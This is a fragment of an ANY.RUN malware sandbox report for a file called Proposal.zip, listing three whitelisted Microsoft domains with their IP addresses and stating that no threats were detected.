settings-win.data.microsoft.com
  • 20.73.194.208
whitelisted
arc.msn.com
  • 20.199.58.43
  • 20.223.36.55
whitelisted
fd.api.iris.microsoft.com
  • 20.223.35.26
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Proposal.zip